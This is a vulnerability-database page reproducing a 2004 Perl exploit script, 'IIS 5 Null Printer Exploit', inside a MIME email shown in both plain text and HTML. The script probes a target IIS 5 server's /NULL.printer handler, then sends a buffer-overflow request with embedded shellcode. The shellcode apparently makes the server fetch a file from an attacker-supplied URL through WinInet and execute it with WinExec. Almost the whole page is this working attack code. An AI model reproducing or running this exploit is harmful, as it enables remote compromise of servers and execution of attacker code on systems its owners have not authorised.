Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

iis.pl.txt

🗓️ 26 Oct 2004 00:00:00Reported by Diabolic CrabType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

IIS 5 Null Printer Exploit script to connect and check for vulnerabilities in the server.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`This is a multi-part message in MIME format.  
  
------=_NextPart_000_001D_01C4B563.F871BDD0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
http://icis.digitalparadox.org/~dcrab/iis.pl=20  
#!/usr/bin/perl -w  
use IO::Socket;  
print "\n#############################################\n";  
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";  
print "# Shouts to Mr.J Zinho Subby Sync #\n";  
print "# Fluidmotion Haking Ta|0n Pheonix #\n";  
print "# Phreaked Bread Moth Volcom Sany #\n";  
print "# Defcon Ref0rm and everyone els #\n";  
print "# C0replay, Hackerscenter, dP #\n";  
print "# www.hackerscenter.com #\n";  
print "# www.digitalparadox.org #\n";  
print "\#############################################\n";  
unless ($ARGV[0]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
unless ($ARGV[1]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
$socket =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
$bish =3D 0;  
$url =3D $ARGV[1];  
print "#Connecting to $ARGV[0]\n";  
unless($socket) {  
die("#Could not connect to $ARGV[0]:80\n");  
exit();  
}  
print "#Connection Established\n";  
$socket->autoflush(1);  
print $socket ("GET /NULL.printer=20  
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");  
print "#Packet sent\n";  
while ($line =3D <$socket>) {  
if ($line eq "<h1>Bad Request</h1>") {  
$bish =3D 1  
}  
}  
if ($bish ne 1) {  
print "#Server seems to be exploitable\n";  
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20  
"\xEB\x30\x5F\xFC\x8B\xF7\x80"  
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=  
2\x04\xC1"  
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=  
2\x7C\x8B"  
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=  
8\x8B\x40"  
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=  
C\x03\x7D"  
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=  
B\xF8\x33"  
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=  
A\x03\x80"  
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=  
1\xF3\xA6"  
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=  
1\xE0\x02"  
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=  
0\x3C\x03"  
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=  
0\xAD\x03"  
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=  
C\x8D\x76"  
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=  
E\x74\x06"  
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=  
E\xEB\x02"  
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=  
D\xFC\x8D"  
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=  
5\xE4\xFC"  
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=  
3\xE2\xE1"  
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=  
3\x51\x53"  
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=  
3\xEB\xF9"  
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=  
4\xFF\xD0"  
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=  
F\xD0\x8D"  
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=  
2\x8D\x7B"  
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=  
6\x1F\xC1"  
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=  
B\x45\xB4"  
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=  
C\xFF\xD0"  
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=  
B\x55\xA4"  
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=  
C\xFF\xD0"  
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=  
F\x64\x75"  
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=  
2\x2E\x64"  
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=  
8\x4C\x6F"  
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=  
4\x08\x5F"  
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=  
3\x08\x5F"  
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=  
9\x74\x50"  
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=  
C\x08\x49"  
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=  
2\x6E\x65"  
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=  
4\x52\x65"  
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=  
F\x73\x65"  
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=  
5\x08"  
,"$url"  
,"\x08\x01");  
$socket2 =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
foreach $ms(@shell) {  
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";  
sleep(1);  
}  
print "#Attempting to download file\n";  
print "#Exploit sent\n";  
close(socket2);  
}  
if ($bish eq 1) {  
print "#Server seems to be not exploitable\n";  
}  
exit();  
  
------=_NextPart_000_001D_01C4B563.F871BDD0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2523" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2><!--StartFragment --><FONT =  
face=3D"Times New Roman"=20  
size=3D3><FONT face=3DArial size=3D2><A=20  
href=3D"http://icis.digitalparadox.org/~dcrab/iis.pl">http://icis.digital=  
paradox.org/~dcrab/iis.pl</A></FONT>&nbsp;</FONT><PRE>#!/usr/bin/perl -w  
use IO::Socket;  
print "\n#############################################\n";  
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";  
print "# Shouts to Mr.J Zinho Subby Sync #\n";  
print "# Fluidmotion Haking Ta|0n Pheonix #\n";  
print "# Phreaked Bread Moth Volcom Sany #\n";  
print "# Defcon Ref0rm and everyone els #\n";  
print "# C0replay, Hackerscenter, dP #\n";  
print "# www.hackerscenter.com #\n";  
print "# www.digitalparadox.org #\n";  
print "\#############################################\n";  
unless ($ARGV[0]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
unless ($ARGV[1]) {  
print "\n#Usage: $0 hostname filetodownload#\n";  
exit();  
}  
$socket =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
$bish =3D 0;  
$url =3D $ARGV[1];  
print "#Connecting to $ARGV[0]\n";  
unless($socket) {  
die("#Could not connect to $ARGV[0]:80\n");  
exit();  
}  
print "#Connection Established\n";  
$socket->autoflush(1);  
print $socket ("GET /NULL.printer=20  
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");  
print "#Packet sent\n";  
while ($line =3D <$socket>) {  
if ($line eq "<h1>Bad Request</h1>") {  
$bish =3D 1  
}  
}  
if ($bish ne 1) {  
print "#Server seems to be exploitable\n";  
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20  
"\xEB\x30\x5F\xFC\x8B\xF7\x80"  
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=  
2\x04\xC1"  
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=  
2\x7C\x8B"  
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=  
8\x8B\x40"  
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=  
C\x03\x7D"  
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=  
B\xF8\x33"  
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=  
A\x03\x80"  
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=  
1\xF3\xA6"  
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=  
1\xE0\x02"  
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=  
0\x3C\x03"  
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=  
0\xAD\x03"  
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=  
C\x8D\x76"  
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=  
E\x74\x06"  
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=  
E\xEB\x02"  
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=  
D\xFC\x8D"  
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=  
5\xE4\xFC"  
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=  
3\xE2\xE1"  
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=  
3\x51\x53"  
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=  
3\xEB\xF9"  
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=  
4\xFF\xD0"  
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=  
F\xD0\x8D"  
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=  
2\x8D\x7B"  
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=  
6\x1F\xC1"  
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=  
B\x45\xB4"  
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=  
C\xFF\xD0"  
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=  
B\x55\xA4"  
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=  
C\xFF\xD0"  
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=  
F\x64\x75"  
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=  
2\x2E\x64"  
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=  
8\x4C\x6F"  
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=  
4\x08\x5F"  
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=  
3\x08\x5F"  
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=  
9\x74\x50"  
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=  
C\x08\x49"  
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=  
2\x6E\x65"  
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=  
4\x52\x65"  
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=  
F\x73\x65"  
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=  
5\x08"  
,"$url"  
,"\x08\x01");  
$socket2 =3D IO::Socket::INET->new(  
Proto =3D> 'tcp',  
PeerAddr =3D> $ARGV[0],  
PeerPort =3D> 80,  
Timeout =3D> 10,  
);  
foreach $ms(@shell) {  
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";  
sleep(1);  
}  
print "#Attempting to download file\n";  
print "#Exploit sent\n";  
close(socket2);  
}  
if ($bish eq 1) {  
print "#Server seems to be not exploitable\n";  
}  
exit();  
</PRE></FONT></DIV></BODY></HTML>  
  
------=_NextPart_000_001D_01C4B563.F871BDD0--  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Oct 2004 00:00Current
7.4High risk
Vulners AI Score7.4
iis 5 exploitperl scriptsecurity vulnerabilitynull printernetwork connectionfile download.
14
.json
Report